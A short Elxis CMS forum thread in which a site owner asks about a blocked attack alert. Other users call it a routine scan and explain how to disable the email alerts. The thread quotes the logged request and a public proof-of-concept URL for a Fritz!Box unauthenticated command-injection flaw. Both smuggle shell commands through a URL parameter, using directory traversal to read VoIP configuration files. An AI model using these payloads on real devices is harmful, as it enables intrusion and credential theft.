Elxis CMS Forum
Support => Security => Topic started by: timalsina on September 08, 2014, 23:40:17
-
I received this email. Any clue what could have been the intention here:
Elxis Defender blocked an attack to your site!
Reference code: SEC-DEFG-0130
Elxis Defender report
Signatures: general
Match method: inmatch
Haystack: requesturi
Pattern match: ..
Reason: Directory traversal attack.
Requested URI: //cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=& allcfgconv -C voip -c -o - ../../../../../var/tmp/voip.cfg &
IP address: 195.154.183.174
Hostname: 195-154-183-174.rev.poneytelecom.eu
User agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.14.0.0 zlib/1.2.3 libidn/1.18 libssh2/1.4.2
Date (UTC): 2014-09-07 18:39:27
Site URL: http://www.sitedomain.com
-
This is what I've found so far: Source(http://www.exploit-id.com/author/admin/page/9)
App : Fritz!Box Author : 0x4148 Fritz!Box is Networking/voice Over ip router produced by AVM it suffer from Unauthenticated remote command execution flaw Poc : https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26 #0x4148_rise - See more at: http://www.exploit-id.com/author/admin/page/9#sthash.U7oGuIkW.dpuf
-
Looks like a random scan for known exploits. Nothing to worry about. I receive dozens of similar alerts daily.
-
Me too! Don't worry... It's a routine!
-
Is there a way to switch off these alerts by email?
-
From backend - [top menu] Site - Settings - [tab] Errors - [Option] Alert switch to No
-
Thanks!